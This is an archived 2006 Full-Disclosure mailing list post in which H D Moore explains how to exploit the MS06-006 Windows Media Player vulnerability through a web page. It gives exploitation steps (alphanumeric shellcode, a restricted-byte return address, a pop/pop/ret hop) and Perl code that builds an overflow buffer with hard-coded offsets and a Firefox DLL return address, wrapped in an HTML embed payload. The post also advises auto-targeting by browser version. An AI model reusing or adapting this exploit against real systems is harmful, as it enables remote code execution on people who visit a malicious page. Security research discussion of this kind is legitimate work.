lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <200602161723.23818.fdlist@digitaloffense.net>
Date: Thu Feb 16 23:23:34 2006
From: fdlist at digitaloffense.net (H D Moore)
Subject: MS06-06 Windows Media Player Exploitation

Still getting some annoying crashes (SEH trick in alphanum code is 
annoying when you are trying to debug something...), but the basic 
solution is:

1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes

my $pattern   = Pex::Text::PatternCreate(16384);	
substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2090, length($shellcode), $shellcode);
$content   = "<html><body><embed src=\"$pattern.wmv\"></body></html>";

Return address is from js3250.dlll in Firefox 1.5.0.1, you should 
auto-target based on the browser version.

-HD

On Thursday 16 February 2006 16:26, c0ntex wrote:
> No exploit, just some basic research - anyone with 100% Ascii win32
> shellcode?
>
> http://open-security.org/winmedia/index.html
>
> --
>
> regards
> c0ntex
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ